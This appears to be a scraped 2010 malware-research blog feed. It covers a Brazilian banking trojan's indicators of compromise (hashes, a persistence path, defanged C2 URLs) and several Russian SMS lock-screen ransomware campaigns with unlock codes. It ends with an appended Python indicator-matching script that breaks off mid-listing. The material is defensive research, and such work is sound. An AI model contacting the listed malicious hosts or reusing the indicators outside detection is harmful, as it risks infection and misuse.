</div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TUWFYX0ULmI/AAAAAAAAAbI/5Dg8SLYBHHE/s1600/6-MI_one+of+the+fake+websites-typing+bank+agency+and+account.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TUWFYX0ULmI/AAAAAAAAAbI/5Dg8SLYBHHE/s400/6-MI_one+of+the+fake+websites-typing+bank+agency+and+account.JPG" width="400" /></a></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> While you are typing your bank agency, account, password, token, etc, the trojan is capturing everything and is written it to a *.bsp file on the C:\Documents and settings\%user%\. Below you have an example:</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div style="text-align: justify;"><br />
</div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TUWFxPEbkwI/AAAAAAAAAbM/RiqJNBjgchY/s1600/10-MI_TXT+file+generated+by+the+trojan+with+all+of+my+passwords-data.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TUWFxPEbkwI/AAAAAAAAAbM/RiqJNBjgchY/s400/10-MI_TXT+file+generated+by+the+trojan+with+all+of+my+passwords-data.JPG" width="400" /></a></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
<b>Indicators of compromise</b><br />
<br />
Check for the existence of the following MD5 on the C:\Documents and Settings\%user%\. </communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<ul><li><i>edaa81ad2165c65bb340e636bf642291</i></li>
<li><i>b82c51f94b0e516f461b6f84a668dfde</i></li>
<li><i>76184bebea96f59086368b64a896d224</i></li>
<li><i>f590d18d7b50109c03c6237d86e8415d</i></li>
<li><i>52ea037028eb2274147aef1edfb64865</i></li>
<li><i>daa21069ae179cc0f195cd42795b592b</i></li>
<li><i>86802efad8fb5b8153d7c7de67cb66bb</i></li>
<li><i>fc7592c9f2e2264c687a806459387d30</i></li>
<li><i>9547ff6be241b5bb8a87f0dabe3b3218</i></li>
<li><i>5cd6a3ac2b2d97e36091a1ecd2fd0aec</i></li>
</ul><div style="text-align: justify;"><div style="text-align: justify;"><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> Check if the process Recorte de tela e Iniciador do OneNote 2007.exe is running or present on the folder C:\Documents and Settings\*\Start Menu\Programs\Startup\ (it's MD5 is d34c8d3ad55f65d701264a5e8e278915)</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></div><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <br />
Network connections to:</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<ul><li><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> <i>hxxp://mylove2010.info/catastrofe/feed10.php</i></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> hxxp://twurl.nl/rbpm6s</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> hxxp://livinianot.com.br/</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
<li><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> ftp.biancarox.net</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></li>
</ul><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> Below you have a report from VirusTotal regarding the samples that we have analyzed here:</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><br />
<br />
<a href="http://www.virustotal.com/file-scan/report.html?id=968db70645fceeb734ba941ee78d51848057762b0559709238c59d4391d1c25e-1295986300" style="color: orange;"><i>id=968db70645fceeb734ba941ee78d51848057762b0559709238c59d4391d1c25e-1295986300</i></a><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=961a9c536b98d02172eb48bd2e0e4881591ac1eb607bf1ea7f267f4994c6b6f6-1295986210" style="color: orange;"><i>id=961a9c536b98d02172eb48bd2e0e4881591ac1eb607bf1ea7f267f4994c6b6f6-1295986210</i></a><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=e6a33cbba7e6348c41cb7e10acac4efaf47286603d54d1c7088f8772bb0f23e8-1295986257" style="color: orange;"><i>id=e6a33cbba7e6348c41cb7e10acac4efaf47286603d54d1c7088f8772bb0f23e8-1295986257</i></a><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=4e908de9a38bb3b90435b0d8b733ad11836a8f65bff2cd6cd247fd47a332af16-1295996254" style="color: orange;"><i>id=4e908de9a38bb3b90435b0d8b733ad11836a8f65bff2cd6cd247fd47a332af16-1295996254</i></a><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=d12ef9562f2deae6ef8e7d5842bf1f1425fc23ce7b6c2265a62189eac14e966f-1295985855" style="color: orange;"><i>id=d12ef9562f2deae6ef8e7d5842bf1f1425fc23ce7b6c2265a62189eac14e966f-1295985855</i></a><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=8d1a2ece03010fe9610c852a70d13c22f9e91d93e39abc939a742d84b279ea64-1295996475" style="color: orange;"><i>id=8d1a2ece03010fe9610c852a70d13c22f9e91d93e39abc939a742d84b279ea64-1295996475</i></a><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=457278ad3bc382dd5159c0be8e9f2f2e3e1cf9191861b56497c81f21f423808d-1295996615" style="color: orange;"><i>id=457278ad3bc382dd5159c0be8e9f2f2e3e1cf9191861b56497c81f21f423808d-1295996615</i></a><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=55d9afec1ad24fcfec03f03cbc7be9b6c21a614db87432e925cdc8112c551c5e-1295996949" style="color: orange;"><i>id=55d9afec1ad24fcfec03f03cbc7be9b6c21a614db87432e925cdc8112c551c5e-1295996949</i></a><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=73cc47196be7bd8c0f7764a46cb4488266bef2ea1ffccbdbd91cd0b62c79919d-1295997136" style="color: orange;"><i>id=73cc47196be7bd8c0f7764a46cb4488266bef2ea1ffccbdbd91cd0b62c79919d-1295997136</i></a><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=26f542326786e4facd624fcb170a71c6a2e709e23c8f4cffa4715e133869316b-1295980568" style="color: orange;"><i>id=26f542326786e4facd624fcb170a71c6a2e709e23c8f4cffa4715e133869316b-1295980568</i></a><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=8f5c8ad99ded74d3cc233b691a803fc6f00ac3113ad67c6f6802ac3ea0f727fc-1295389644" style="color: orange;"><i>id=8f5c8ad99ded74d3cc233b691a803fc6f00ac3113ad67c6f6802ac3ea0f727fc-1295389644</i></a><br />
<br />
<communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> Bruno Caseiro<br />
Malware Researcher<br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-1670645896303580754.post-66825174880332099342010-10-27T17:07:00.000+01:002010-10-27T17:07:57.530+01:00SMS Ransomware. From Russia to the world<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TMhNJMqDItI/AAAAAAAAAag/_RG_7j1iNJ8/s1600/MI-ransom_23102010.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><br />
<div style="text-align: justify;">The new generation of malicious code, designed to fund criminal groups by having victims send premium-rate SMS text messages, is now a pattern that has already spread worldwide.<br />
<br />
Although this type of ransomware is developed for a Russian-speaking audience and is very common in Russia, any user anywhere in the world is a potential victim.<br />
<br />
The offenders change the on-screen graphic design daily; minimalist but very aggressive, it always provides the information the victim needs, in theory, to obtain the key that unlocks access to the operating system, in exchange, of course, for a sum of money, in this case 360 rubles (just over $10).</div><br />
<div style="text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TMhNJMqDItI/AAAAAAAAAag/_RG_7j1iNJ8/s1600/MI-ransom_23102010.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TMhNJMqDItI/AAAAAAAAAag/_RG_7j1iNJ8/s400/MI-ransom_23102010.png" width="400" /></a><br />
<b>SMS Ransomware template</b><br />
<i>The latest campaign spreading this family of ransomware uses this design.</i></div><br />
<div style="text-align: justify;">The truth is that, despite not being complex in its construction, this family represents one of the more aggressive and invasive malicious codes. Not only does blocking the system also block access to every function and program of the operating system, but while the user is looking at the ransomware screen the infection is reported to an affiliate program (usually Pay-per-Install), and in some cases the malware tries to steal authentication credentials.</div><b><br />
Related Information</b><br />
<div style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/10/new-variante-of-sms-ransomware-itw.html">New variant of SMS Ransomware ItW</a></div><a href="http://malwaredisasters.blogspot.com/2010/09/microsoft-security-antivirus-ransomware.html" style="color: orange;">Microsoft Security Antivirus ransomware</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/09/new-sms-ransomware-template-with-slight.html" style="color: orange;">New SMS ransomware template with slight change</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/09/campaign-to-disseminate-russian.html"><span style="color: orange;">Campaign to disseminate russian ransomware</span> </a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/new-russian-sms-ransomware-in-wild.html" style="color: orange;">New Russian SMS ransomware In-the-Wild</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/sms-ransomware-porn-template-update.html" style="color: orange;">SMS Ransomware porn template update</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><br />
<br />
<b>New variant of SMS Ransomware ItW</b> (published 2010-10-21)<br />
<div style="text-align: justify;">Ransomware-type malicious code has become more firmly positioned in the malware business.<br />
<br />
In this respect, the programs of this style that used complex encryption algorithms, exploiting the conventional techniques of cryptovirology, are long gone; today we find a kind of ransomware that seeks to block access to the victim's operating system, demanding small sums that nevertheless feed the economy of criminal groups every day.</div><br />
This time, the template used is shown in the following screenshot:<br />
<div style="text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TL-tdvpmjpI/AAAAAAAAAac/2OYrncoppA0/s1600/MIransom201002010.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TL-tdvpmjpI/AAAAAAAAAac/2OYrncoppA0/s400/MIransom201002010.png" width="400" /></a></div><div style="text-align: center;"><b>SMS Ransomware</b><br />
<i>New variant of SMS Ransomware requesting the sum of 400 rubles (Russian currency)</i></div><br />
<div style="text-align: justify;">This new variant is similar to those previously propagated in this family, with the peculiarity of incorporating an on-screen numeric keypad, needed to "type" the number that will unlock the system.<br />
<br />
This maneuver is not arbitrary: it is a defensive and evasive strategy of blocking the keyboard, precluding any attempt to reach the affected system's own programs.<br />
<br />
Although this new generation of ransomware does not kidnap the victim's data the way older programs in this category such as GPCode did, it is extremely invasive and difficult to eradicate if no preventive tools are in place to protect against infections of this caliber.</div><br />
<b>Related Information </b><br />
<br />
<a href="http://malwaredisasters.blogspot.com/2010/09/microsoft-security-antivirus-ransomware.html" style="color: orange;">Microsoft Security Antivirus ransomware</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/09/new-sms-ransomware-template-with-slight.html" style="color: orange;">New SMS ransomware template with slight change</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/09/campaign-to-disseminate-russian.html"><span style="color: orange;">Campaign to disseminate russian ransomware</span> </a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/new-russian-sms-ransomware-in-wild.html" style="color: orange;">New Russian SMS ransomware In-the-Wild</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/sms-ransomware-porn-template-update.html" style="color: orange;">SMS Ransomware porn template update</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><br />
<br />
<b>Microsoft Security Antivirus ransomware</b> (published 2010-09-14)<br />
<div style="text-align: justify;">Criminal groups from Russia, constantly trying to raise money fraudulently, have maliciously re-launched a scheme based on ransomware. In this case, the strategy is to display a window positioned in the center of the desktop, showing a message in Russian under the title "<b>Microsoft Security Antivirus</b>".</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TI64Ud80dcI/AAAAAAAAAZU/H66fw-Y_kgE/s1600/MI_MSA-Ransom.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TI64Ud80dcI/AAAAAAAAAZU/H66fw-Y_kgE/s320/MI_MSA-Ransom.png" /></a></div><div style="text-align: center;"><b>Ransomware opening message</b><br />
<i>The window displayed by the ransomware is located in the center of the screen and blocks any possibility of accessing Windows programs.</i></div><br />
<div style="text-align: justify;">This malware is part of the same family of ransomware that has plagued the Internet; it appears under different designs, some more aggressive than others, but ultimately with the same magnitude of risk and the same objectives.<br />
<br />
Although this variant does not promote any websites with pornographic content, it claims its reward through a premium-rate SMS text message, in this case to the number <b>89030064850</b>. The reward consists of a payment of <b>400 rubles</b> (Russian currency).</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TI65PV_LzxI/AAAAAAAAAZc/wF7w7WL0ACk/s1600/MI_ransom-400.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TI65PV_LzxI/AAAAAAAAAZc/wF7w7WL0ACk/s320/MI_ransom-400.png" /></a></div><div style="text-align: center;"><b>Reward Request</b><br />
<i>In this way the offender makes an economic profit through a fraudulent and illegal mechanism that, in many cases, requires users to pay the money without any guarantee that they will receive the unlock key.</i></div><br />
<br />
<div style="text-align: justify;">Ransomware has become commonplace, providing a heavily exploited resource for computer criminals who, through affiliate systems, collect the profits and manage the spread of the threat using specific crimeware.<br />
<br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
<a href="http://siri-urz.blogspot.com/" style="color: orange;">S!Ri</a> has published some unlock codes that can be used to regain control of the system. Thanks S!Ri.<br />
<br />
Number to Call: <b>89030139823</b><br />
Number to Call: <b>89030065742</b><br />
Code to unlock Windows: <b>77294738T</b><br />
<br />
Number to Call: <b>89030064258</b><br />
Number to Call: <b>89030064960</b><br />
Number to Call: <b>89030065384</b><br />
Number to Call: <b>89030139997</b><br />
Code to unlock Windows: <b>720194320Q</b></div><br />
<b>Related Information</b><br />
<br />
<a href="http://malwaredisasters.blogspot.com/2010/09/new-sms-ransomware-template-with-slight.html" style="color: orange;">New SMS ransomware template with slight change</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/09/campaign-to-disseminate-russian.html"><span style="color: orange;">Campaign to disseminate russian ransomware</span> </a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/new-russian-sms-ransomware-in-wild.html" style="color: orange;">New Russian SMS ransomware In-the-Wild</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/sms-ransomware-porn-template-update.html" style="color: orange;">SMS Ransomware porn template update</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><br />
<br />
<b>New SMS ransomware template with slight change</b> (published 2010-09-09)<br />
<div style="text-align: justify;">Recently a new variant of the SMS ransomware family that spreads through, and promotes, pornographic sites has appeared In-the-Wild with a superficial makeover.</div><br />
<div style="text-align: justify;">For several weeks a campaign has been active that spreads a variant of this type of ransomware displaying a black window covering the entire desktop. This time the window does not cover the entire desktop but sits in its center, yet it still disables any possibility of accessing the system's applications.</div><br />
<div style="text-align: justify;">As in previous campaigns, to release the system it asks the victim to send an SMS message to a certain number, requesting, according to the variants detected so far, 350, 400 or 410 rubles (Russian currency).</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TIhBdiVMsWI/AAAAAAAAAYs/gKIL4ymHy-w/s1600/MI_ransom-350.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TIhBdiVMsWI/AAAAAAAAAYs/gKIL4ymHy-w/s400/MI_ransom-350.png" width="400" /></a></div><div style="text-align: center;"><b>SMS Ransomware asking for 350 rubles</b></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TIhBroubxCI/AAAAAAAAAY0/_8UWsXIxqVg/s1600/MI_ransom-400.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TIhBroubxCI/AAAAAAAAAY0/_8UWsXIxqVg/s400/MI_ransom-400.png" width="400" /></a></div><div style="text-align: center;"><b>SMS Ransomware asking for 400 rubles</b></div><br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
<div style="text-align: justify;">For cases where the ransomware requests 410 rubles for a key to unlock the system, any of the following unlock keys, provided <a href="http://siri-urz.blogspot.com/" style="color: orange;">by S!Ri on his blog</a> (thanks S!Ri!), can be used:</div><br />
Number to Call: <b>89654028516</b><br />
Number to Call: <b>89654028759</b><br />
Number to Call: <b>89654028794</b><br />
Code to unlock Windows: <b>403947563!</b><br />
<br />
Number to Call: <b>89654028519</b><br />
Code to unlock Windows: <b>$334327890$</b><br />
<br />
Number to Call: <b>89654028477</b><br />
Number to Call: <b>89654028491</b><br />
Number to Call: <b>89654028518</b><br />
Code to unlock Windows: <b>$009264834$</b><br />
<br />
<b>Related information</b><br />
<a href="http://malwaredisasters.blogspot.com/2010/09/campaign-to-disseminate-russian.html"><span style="color: orange;">Campaign to disseminate russian ransomware</span> </a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/new-russian-sms-ransomware-in-wild.html" style="color: orange;">New Russian SMS ransomware In-the-Wild</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/sms-ransomware-porn-template-update.html" style="color: orange;">SMS Ransomware porn template update</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><br />
<br />
<b>Jorge Mieres</b> <br />
Founder & Director of <b>Malware<span class="blue">Intelligence</span></b> <br />
Crimeware & Intelligence Analyst Researcher<br />
<br />
<b>Campaign to disseminate russian ransomware</b> (published 2010-09-03)<br />
<div class="separator" style="clear: both; text-align: left;"><b>Updated 09/03/2010</b></div><div style="text-align: justify;">S!Ri is doing a great job gathering the information needed to unlock this and other variants of ransomware. He has kindly agreed to share his work with us by providing an update with new codes. Great job S!Ri, and thank you very much for sharing the data :)</div><div class="separator" style="clear: both; text-align: left;"><br />
Number to Call: <b>89654028569</b><br />
Number to Call: <b>89654028703</b><br />
Code to unlock Windows: <b style="color: black;">!8912034'</b></div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: left;">Number to Call: <b>89654028578</b><br />
Number to Call: <b>89654028597</b><br />
Number to Call: <b>89654028594</b><br />
Number to Call: <b>89654028566</b><br />
Number to Call: <b>89654028563</b><br />
Number to Call: <b>89654028583</b><br />
Number to Call: <b>89654028725</b><br />
Number to Call: <b>89654028717</b><br />
Number to Call: <b>89654028703</b><br />
Code to unlock Windows: <b style="color: black;">(30958374)</b></div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: left;">Number to Call: <b>89654028562</b><br />
Number to Call: <b>89654028563</b><br />
Number to Call: <b>89654028590</b><br />
Number to Call: <b>89654028595</b><br />
Number to Call: <b>89654028598</b><br />
Number to Call: <b>89654028578</b><br />
Number to Call: <b>89654028614</b><br />
Number to Call: <b>89654028723</b><br />
Code to unlock Windows: <b style="color: black;">~2058205~</b><br />
<br />
You can find more information about ransomware and rogue-type malware on his blog:</div><div class="separator" style="clear: both; text-align: left;"><a href="http://siri-urz.blogspot.com/" style="color: orange;">http://siri-urz.blogspot.com</a></div><div style="text-align: justify;"><br />
<b>Original 09/02/2010</b> <br />
Every so often a new ransomware campaign appears, designed to block access to the operating system by displaying a message that asks the victim to send a premium-rate SMS text message to a certain number in order, in theory, to receive a key that restores access to the system.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TIBYViizOsI/AAAAAAAAAW0/zjrSUKQeM0E/s1600/MI_ransom-russian.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TIBYViizOsI/AAAAAAAAAW0/zjrSUKQeM0E/s400/MI_ransom-russian.png" width="400" /></a></div><div style="text-align: center;"><b>SMS Ransomware</b><br />
<i>The window occupies the whole screen, closing off access to any program. When the correct password is entered, the window disappears and the executable binary deletes itself.</i></div><br />
<div style="text-align: justify;">This ransomware has been distributed since late July and has had several campaigns so far. All show the same message and design style but change the phone number to which the text message must be sent. Some of the executables that are part of this campaign are:</div><br />
<ul><li><b>vip_porno_12730.avi.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=153b5e59b4443b0832cab7456a88891c8fb1eb04c2f3e05a3a13084b5909dd62-1283384334" style="color: orange;">5b1d7ce7acf6de3e8b7d856bdc6127ba</a>) - <b>PornoBlocker/LockScreen</b></li>
<li><b>vip_porno_49873.avi.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=13e9befa760ee385be462809f33f26488f24e7e17dec865362503b2dc3a7d59c-1283356844" style="color: orange;">20830c687b1535aefa1f281fb1c6a513</a>) - <b>PornoBlocker/LockScreen</b></li>
<li><b>vip_porno_79341.avi.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=ab7500389535531b13b079004d983c563368e242586c6f0074af28bb809a5f7a-1283440320" style="color: orange;">6e4ecc96a88e36c9ec12d4b500aef331</a>) - <b>PornoBlocker/LockScreen</b></li>
<li><b>vip_porno_81380.avi.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=e2b49e20de75631bdd79296ff05a0ea0eee4156b48cb8d5c90743849f8b81f54-1283261573" style="color: orange;">3c637427af826f877a50c5a8763fe4f0</a>) - <b>PornoBlocker/LockScreen</b></li>
</ul><div style="text-align: justify;">The offender's business is the percentage of the charge for each SMS that victims send to these different number ranges. The amount the offender demands in the message in order to unlock access to the system is 400 rubles. That sum is expressed in Russian currency (рубль) and is equivalent to $13 U.S.</div><br />
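The four samples above are the only hard indicators this post gives (file names and MD5 hashes). As an added example, not code from this blog or its authors, the following Python script matches an endpoint file inventory against those hashes, against the vip_porno_&lt;n&gt;.avi.exe naming scheme of the campaign, and against the more general double-extension trick (a media or document extension followed by an executable one, which hides the real file type when extensions are not shown). The inventory records are constructed for illustration; the placeholder digest d41d8cd98f00b204e9800998ecf8427e is simply the MD5 of empty input, not a real sample.

```python
"""Match a file inventory against the PornoBlocker/LockScreen indicators
quoted in the post.  Added example; the four MD5 values are the ones listed
above, everything else (records, placeholder hash) is constructed."""
import re
from typing import Dict, Iterable, List, Tuple

# MD5 -> file name, exactly as listed in the post.
KNOWN_SAMPLES: Dict[str, str] = {
    "5b1d7ce7acf6de3e8b7d856bdc6127ba": "vip_porno_12730.avi.exe",
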